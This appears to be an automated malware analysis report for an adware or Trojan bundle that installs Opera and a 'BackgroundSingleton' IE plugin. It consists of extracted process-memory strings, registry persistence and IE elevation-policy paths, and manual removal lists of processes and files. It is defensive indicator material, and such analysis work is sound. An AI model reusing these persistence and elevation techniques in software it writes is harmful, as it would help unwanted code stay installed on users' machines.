Software\Opera Software

opera_autoupdate.exe

chrome.exe

metro_driver.dll

Chrome_StatusTrayWindow

Reported Crashes.txt

testing_interface.dll

chrome.dll

Origin Bound Certs

Certificate Revocation Lists

Custom Dictionary.txt

Login Data

Cached Theme.pak

Web Applications

pepflashplayer.dll

CHROME_METRO_NAV_SEARCH_REQUEST

CHROME_METRO_GET_CURRENT_TAB_INFO

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

portuguese-brazilian

Software\Microsoft\Windows\CurrentVersion\Run

Software\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32

Opera{Product}

Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\{Extension}\UserChoice

URL Protocol

{InstallFolder}\Launcher.exe,0

"{InstallFolder}\launcher.exe" -noautoupdate -- "%1"

Software\Classes\{Protocol}\shell\open\ddeexec

Software\Classes\{Protocol}\shell\open\ddeexec\Application

Software\Classes\{Protocol}\shell\open\ddeexec\Topic

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\{Protocol}\UserChoice

https

Opera Software

installation_status.xml

launcher.exe

OperaSoftware.OperaWebBrowser.

Opera

installer_prefs.json

operaprefs_default.ini

opera_install_log.xml

shell32.dll

IEXPLORE.EXE_592:

.text

`.data

.idata

.rsrc

@.reloc

u\j.Xf9

j.Xf9

USER32.dll

api-ms-win-downlevel-shell32-l1-1-0.dll

IEFRAME.dll

SHELL32.dll

iexplore.pdb

api-ms-win-downlevel-shlwapi-l1-1-0.dll

iertutil.dll

api-ms-win-downlevel-advapi32-l1-1-0.dll

KERNEL32.dll

msvcrt.dll

_wcmdln

_amsg_exit

RegOpenKeyExW

RegCloseKey

<!-- Note: This manifest needs to be kept in sync with iexplore.exe.manifest -->

<assemblyIdentity version="5.1.0.0"

name="Microsoft.InternetExplorer"

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<!--The ID below indicates application support for Windows 8 -->

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

KEYW

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

imm32.dll

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}

Kernel32.dll

"%s" %s

kernel32.dll

IEXPLORE.EXE

{00000000-0000-0000-0000-000000000000}

\\?\Volume

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Browseui_Tabs_Tearoff_BetweenWindows_TabProc

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

Shdocvw_BaseBrowser_FireEvent_BeforeScriptExecute

IMTravelLogMVC_TravelURL

10.00.9200.16521 (win8_gdr_soc_ie.130216-2100)

Windows

10.00.9200.16521

opera.exe_3104_rwx_3D50A000_000F5000:

=HTTP

opera.exe_3584_rwx_1F00A000_000F5000:

=.qah

BackgroundSingleton.exe_3692:

.text

`.rdata

@.data

.rsrc

@.reloc

<1%u3

t8It.IIt#

.CGy*

SShHA

FTPj

udPV

,4,56,789

[u%SS

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

W3.7.17

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

large file support is disabled

unknown operation

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_log

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

GetProcessHeap

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

os_win.c:%d: (%lu) %s(%s) - %s

delayed %dms for lock/sharing conflict

%s-shm

%s\etilqs_

%s\%s

recovered %d pages from %s

recovered %d frames from WAL file %s

cannot limit WAL size: %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

unknown database %s

keyinfo(%d

%s(%d)

%s-mjXXXXXX9XXz

MJ delete: %s

MJ collide: %s

-mjX9X

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot release savepoint - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open value of type %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

EXECUTE %s%s SUBQUERY %d

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

type='trigger' AND (%s)

sqlite_

table %s may not be altered

there is already another table or index with this name: %s

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE %s=%Q

SELECT tbl,idx,stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

sqlite_stat%d

DELETE FROM %Q.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

sqlite_stat

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

a JOIN clause is required before %s

unable to identify the object to be reindexed

no such collation sequence: %s

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch - "%w" referencing "%w"

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

constraint %s failed

PRIMARY KEY must be unique

sqlite3_extension_init

%s.%s

unable to open shared library [%s]

sqlite3_

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

foreign_key_check

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

USE TEMP B-TREE FOR %s

COMPOUND SUBQUERIES %d AND %d %s(%s)

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

too many references to "%s": max 65535

%s.%s.%s

no such table: %s

SCAN TABLE %s %s%s(~%d rows)

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

cannot VACUUM - SQL statements in progress

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

%s SUBQUERY %d

%s TABLE %s

%s AS %s

%s USING %s%sINDEX%s%s%s

%s USING INTEGER PRIMARY KEY

%s (rowid=?)

%s (rowid>? AND rowid<?)

%s (rowid>?)

%s (rowid<?)

%s VIRTUAL TABLE INDEX %d:%s

%s (~%lld rows)

at most %d tables in a join

cannot use index: %s

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unknown database: %s

no such %s mode: %s

%s mode not allowed: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

GdiplusShutdown

gdiplus.dll

KERNEL32.dll

UnhookWindowsHookEx

SetWindowsHookExW

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegQueryInfoKeyW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

urlmon.dll

GetCPInfo

.?AVCDbSQLite@@

.?AVCSqlStatement@@

.?AV?$CAtlExeModuleT@VCBackgroundSingletonHelperModule@@@ATL@@

.?AV?$_IDispEventLocator@$0A@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0A@VCEmbeddedBrowser@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventImpl@$0A@VCEmbeddedBrowser@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

zcÁ

stdole2.tlbWWW

passSyncCommandToForegroungW

TspassAsyncCommandToForegroungd

passSyncCommandW

passAsyncCommand$

method passSyncCommandToForegroung#

method passAsyncCommandToForegroungWWW

method passSyncCommandToBackground#

method passAsyncCommandToBackgroundWWW

Created by MIDL version 7.00.0555 at Wed Aug 07 17:44:06 2013

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

0!1)1?1_1

7"7&7*7.72767:7

2&2D2N2T2Z2d2n2z2

709,:9:?:

>">&>*>.>

4 5,575<5

1 1<1@1`1

2 2$2(20282

3 3@3`3|3

mscoree.dll

ekernel32.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

nKERNEL32.DLL

WUSER32.DLL

888816666554443

6666554443

!6666554443

Interfaces32.dll

info.json

{1A9DF610-9250-4588-A16B-2s}

{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}

CREATE TABLE IF NOT EXISTS storage (Name TEXT PRIMARY KEY NOT NULL, Value BLOB)

AdvAPI32.dll

W%s\Storage.db

Advapi32.dll

ieframe.dll

CLSID\%s

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\%s

Mscoree.dll

OLEAUT32.DLL

%s://popup.html

%sfiles\%s

://Kernel.js

%s://background.html

%Program Files% (x86)\advPlugin\BackgroundSingleton.exe

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

TPAutoConnSvc.exe:1776
w0jKC6uoKzUY.exe:3152
%original file name%.exe:3852
installer.exe:3804
Df6Dtkv9LPdV.exe:3996
Df6Dtkv9LPdV.exe:1532
opera.exe:3924
opera.exe:2104
opera.exe:3308
opera.exe:3536
opera.exe:3656
opera.exe:3108
opera.exe:2340
opera.exe:2888
opera.exe:3576
opera.exe:4048
opera.exe:4720
opera.exe:1408
opera.exe:4492
opera.exe:1440
opera.exe:1396
opera.exe:2016
opera.exe:2264
opera.exe:568
opera.exe:200
opera.exe:3912
opera.exe:580
opera.exe:3740
opera.exe:1276
opera.exe:4988
opera.exe:3456
opera.exe:3528
opera.exe:972
opera.exe:4732
opera.exe:3464
opera.exe:5080
opera.exe:2516
opera.exe:800
opera.exe:3264
M4qMs9te1cPN.exe:4064
BackgroundSingleton.exe:3248
Uninstaller.exe:1732
cscript.exe:3508
opera_autoupdate.exe:3696
opera_autoupdate.exe:2588
rW6IhvkK2QUK.exe:2172
regsvr32.exe:3184
regsvr32.exe:320
regsvr32.exe:3180
bAQhdcvmXpIk.exe:3192
JUR0CxdplxCY.exe:4040
JUR0CxdplxCY.exe:1936
ExtensionUpdaterService.exe:2632
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\ntuser.dat.LOG1 (3992 bytes)
C:\Users\"%CurrentUserName%"\NTUSER.DAT (4800 bytes)
C:\Users\"%CurrentUserName%"\Desktop\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.ico (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\netF42F.tmp (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\M4qMs9te1cPN.exe (63927 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\rW6IhvkK2QUK.exe (101249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Df6Dtkv9LPdV.exe (47084 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bAQhdcvmXpIk.exe (208068 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\w0jKC6uoKzUY.exe (63927 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\JUR0CxdplxCY.exe (125396 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\launcher_lib.dll (3361 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_100_percent.pak (10177 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\libGLESv2.dll (8657 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ru.pak (673 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-180.png (2 bytes)
%Program Files% (x86)\Opera\9175.tmp (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ro.pak (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113148.log (474034 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\de.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_autoupdate.licenses (14 bytes)
%Program Files% (x86)\Opera\installation_status.xml (11 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sr.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\message_center_win8.dll (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\zh-CN.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_autoupdate.exe (15116 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-80.png (2 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-80.png (1 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\launcher.exe (3564 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\win8_importing.dll (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\te.pak (1425 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ca.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\license.txt (17 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\tr.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pa.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_200_percent.pak (15116 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pl.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\da.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
%Program Files% (x86)\Opera\Resources.pri (3 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ja.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\cs.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\msvcp100.dll (2321 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\nn.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera.exe (389498 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\ffmpegsumo.dll (7385 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\nb.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ta.pak (1425 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ms.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_125_percent.pak (8281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\id.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\az.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
C:\Users\Public\Desktop\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\zu.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\af.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\vi.pak (673 bytes)
%Program Files% (x86)\Opera\server_tracking_data (489 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pt-BR.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\en-US.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\be.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_crashreporter.exe (3361 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-140.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\hu.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\th.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\icudtl.dat (81149 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pt-PT.pak (601 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sw.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-80_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\es.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\lv.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\kk.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\en-GB.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\d3dcompiler_46.dll (22786 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\bn.pak (1425 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\mk.pak (673 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-100.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\hr.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\default_partner_content.json (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\nl.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\it.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ko.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_150_percent.pak (8281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\es-419.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_autoupdate.version (5 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sk.pak (601 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-180_contrast-white.png (4 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fy.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\dictionaries.xml (11 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\msvcr100.dll (5441 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-140.png (3 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera.pak (119504 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\libEGL.dll (1281 bytes)
%Program Files% (x86)\Opera\launcher.visualelementsmanifest.xml (318 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\zh-TW.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\installer.exe (7971 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fil.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\uz.pak (673 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\osmesa.dll (22350 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\me.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\wow_helper.exe (601 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-180.png (4 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fr-CA.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_250_percent.pak (6841 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sv.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\hi.pak (1281 bytes)
